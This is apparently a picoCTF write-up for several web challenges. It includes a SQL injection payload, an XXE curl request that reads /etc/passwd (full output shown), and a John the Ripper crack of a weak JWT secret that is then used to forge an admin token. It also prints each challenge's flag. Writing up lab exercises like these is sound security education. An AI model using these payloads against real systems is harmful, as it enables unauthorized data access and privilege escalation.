findme - 100 pts
Description
Help us test the form by submitting the username as test
and password as test!
Approach
After logging in to the page using the provided credentials, we were instantly redirected to two pages that appeared to be named in Base64 encoding. I used BurpSuite to intercept and forward both requests individually, which allowed me to capture the flag.
Flag: picoCTF{proxies_all_the_way_df44c94c}
MatchTheRegex - 100 pts
Description
How about trying to match a regular expression
Approach
For this one we have to write a regular expression that matches the flag pattern: picoCTF.*
Flag: picoCTF{succ3ssfully_matchtheregex_08c310c6}
More SQLi - 200 pts
Description
Can you find the flag on this website.
Approach
we can see the SQL query being made in response
This simple SQLi Payload works: ‘ OR 1=1 --
Flag: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_e3e46aae}
SOAP - 100 pts
Description
The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?
Approach
Upon inspecting the page’s source code, we discovered that there is an endpoint named “/data” that uses XML, as indicated by the corresponding JavaScript file. This suggests that the application may be vulnerable to XML External Entity (XXE) attacks.
I sent this payload using curl and got the flag
┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ curl -X POST -H "Content-Type: application/xml"
-d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE
data [ <!ENTITY test SYSTEM "file:///etc/passwd" > ]>
<data><ID>&test;</ID></data>' http://saturn.picoctf.net:53312/data
Invalid ID: root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt❌100:65534::/nonexistent:/usr/sbin/nologin
flask❌999:999::/app:/bin/sh
picoctf❌1001:picoCTF{XML_3xtern@l_3nt1t1ty_e5f02dbf}
Flag: picoCTF{XML_3xtern@l_3nt1t1ty_e5f02dbf}
Java Code Analysis!?!
Description
BookShelf Pico, my premium online book-reading service.I believe that my website is super secure. I challenge you to prove me wrong by reading the ‘Flag’ book!Here are the credentials to get you started:
- Username: “user”
- Password: “user”
Source code can be downloaded here
Approach
Upon logging in with the provided credentials, users are assigned the free user role. The website offers three types of user roles: free, premium, and admin. Only users with the admin role have access to the flag book.
Based on the given hints, it appears that the website is using JWT for user authentication. With this information, we can check whether it is possible to modify our user role to become an admin.
To get the authentication token, we can inspect the cookies using the Chrome Developer Tools.
jwt.io can be used to decode the token and potentially modify its contents.
In order to modify the JWT, we would need to have the secret key used to sign it. If the secret key is not sufficiently complex, it may be possible to crack it using a tool like John the Ripper. In this particular case, John the Ripper was able to crack the key in under a second because the key was a simple one - ‘1234’.
┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoi
RnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY4MjU0NjM2OCwiaWF
0IjoxNjgxOTQxNTY4LCJ1c2VySWQiOjEsImVtYWlsIjoidXNlciJ9.au2F6
GtDI5Zoq9ihgltHoYBKbrvutqViF2A0QalxNTw" > jwt.txt
┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ john jwt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
1234 (?)
1g 0:00:00:00 DONE 2/3 (2023-04-19 18:01) 50.00g/s
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have obtained the secret key, we can modify the token to change our user role to admin. Once we have made the necessary changes, we can load the modified token into the local storage using the inspect tool.
After loading the modified token into the local storage, we can simply refresh the page to get the flag.